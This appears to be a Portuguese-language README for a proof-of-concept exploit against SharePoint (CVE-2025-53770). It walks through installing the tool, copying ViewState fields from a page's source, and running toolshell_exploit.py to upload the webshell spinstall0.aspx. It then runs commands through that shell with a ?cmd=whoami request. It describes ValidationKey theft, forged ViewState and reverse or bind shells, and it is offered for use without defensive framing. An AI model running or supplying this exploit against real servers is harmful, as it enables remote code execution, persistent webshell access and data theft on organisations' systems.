
Exploit PoC para CVE-2025-53770 que permite upload de webshell no SharePoint, extração de ValidationKey, geração de ViewState assinado e execução remota de código via shell reverso ou bind shell.
Este pacote permite:
git clone <this-repo>
cd toolshell-exploit
pip3 install -r requirements.txt
Envie a webshell
A partir de uma página do SharePoint, você pode acessar o código-fonte da página. Basta ir na guia de visualização de código-fonte e, se disponível, você obterá o seguinte, que pode ser copiado:
A) __VIEWSTATEGENERATOR
B) __EVENTVALIDATION
C) (qualquer __VIEWSTATE atual para contexto)
python3 toolshell_exploit.py \
--target https://sharepoint.local \
--viewstate "<any_BASE64_VIEWSTATE>" \
--generator "<VIEWSTATEGENERATOR>" \
--eventval "<EVENTVALIDATION>"
Isso envia spinstall0.aspx. Verifique: https://sharepoint.local/_layouts/15/spinstall0.aspx?cmd=whoami